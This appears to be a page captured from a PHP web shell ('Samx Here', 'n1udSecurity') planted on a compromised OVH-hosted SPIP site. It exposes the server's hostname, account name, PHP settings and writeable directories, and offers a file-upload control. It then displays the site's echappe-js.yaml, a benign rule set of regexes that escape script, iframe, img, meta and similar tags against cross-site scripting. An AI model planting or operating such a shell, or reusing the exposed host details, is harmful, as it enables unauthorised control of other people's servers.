Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/info/plugins-dist/textwheel/wheels/spip/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/info/plugins-dist/textwheel/wheels/spip/echappe-js.yaml
--- # Syntaxe des raccourcis SPIP, version 0.0.1
    #
    # Si on nomme une regle, elle devient surchargeable

-
  if_str: "<script"
  match: "{<script.*?($|</script.)}isS"
  is_wheel: y
  replace:
    -
      type: all
      replace: spip_htmlspecialchars
      is_callback: Y
    -
      type: all
      replace: nl2br
      is_callback: Y
    -
      type: all
      replace: "<code class=\"echappe-js\">$0</code>"

-
  if_str: "<iframe"
  match: "{<iframe.*?($|</iframe.)}isS"
  is_callback: Y
  replace: echappe_anti_xss

-
  if_str: "<embed"
  match: "{<embed.*?($|</embed.)}isS"
  is_callback: Y
  replace: echappe_anti_xss

-
  if_str: "<object"
  match: "{<object.*?($|</object.)}isS"
  is_callback: Y
  replace: echappe_anti_xss

-
  if_str: "<img"
  match: "{<img.*?($|>)}isS"
  is_callback: Y
  replace: echappe_anti_xss

-
  if_str: "<image"
  match: "{<image.*?($|>)}isS"
  is_callback: Y
  replace: echappe_anti_xss

-
  if_str: "<body"
  match: "{<body.*?($|>)}isS"
  is_callback: Y
  replace: echappe_anti_xss

-
  if_str: "<bgsound"
  match: "{<bgsound.*?($|>)}isS"
  is_callback: Y
  replace: echappe_anti_xss

-
  if_str: "<meta"
  match: "{<meta.*?($|>)}isS"
  is_callback: Y
  replace: echappe_anti_xss

SAMX